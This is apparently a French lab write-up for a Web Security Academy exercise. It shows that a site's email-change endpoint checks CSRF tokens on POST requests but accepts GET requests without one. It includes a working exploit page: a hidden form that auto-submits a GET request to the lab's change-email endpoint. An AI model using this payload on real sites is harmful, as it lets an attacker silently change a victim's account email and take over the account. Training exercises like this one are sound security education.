CSRF avec validation du jeton selon la méthode HTTP

CSRF where token validation depends on request method

Lab: CSRF where token validation depends on request method | Web Security AcademyWebSecAcademy

Contexte du lab

La fonctionnalité de changement d’email est vulnérable à une attaque CSRF. Une défense est présente, mais elle n’est appliquée qu’à certains types de requêtes. Objectif : héberger une page sur le serveur d’exploit qui force la victime à changer son adresse email. Identifiants fournis pour tests : wiener:peter.

Constat

Un jeton CSRF est vérifié pour les requêtes POST.

La même action acceptée en GET n’exige pas de jeton.
L’endpoint concerné : /my-account/change-email.

Héberger sur le serveur d’exploit une page qui envoie automatiquement une requête GET vers l’endpoint de changement d’email :

<form class="login-form" name="change-email-form" action="https://0a72007c0337ccb880ed1c9b00fa00d1.web-security-academy.net/my-account/change-email" method="GET">
           <input required="" type="email" name="email" value="[email protected]">
</form>

<script>
   document.forms[0].submit();
</script>

L’URL suivante illustre le contournement (aucun jeton requis en GET)

/my-account/change-email?email=test%40test.com

Mis à jour il y a 4 mois

hashtagCSRF where token validation depends on request method

hashtagContexte du lab

hashtagConstat

CSRF where token validation depends on request method

Contexte du lab

Constat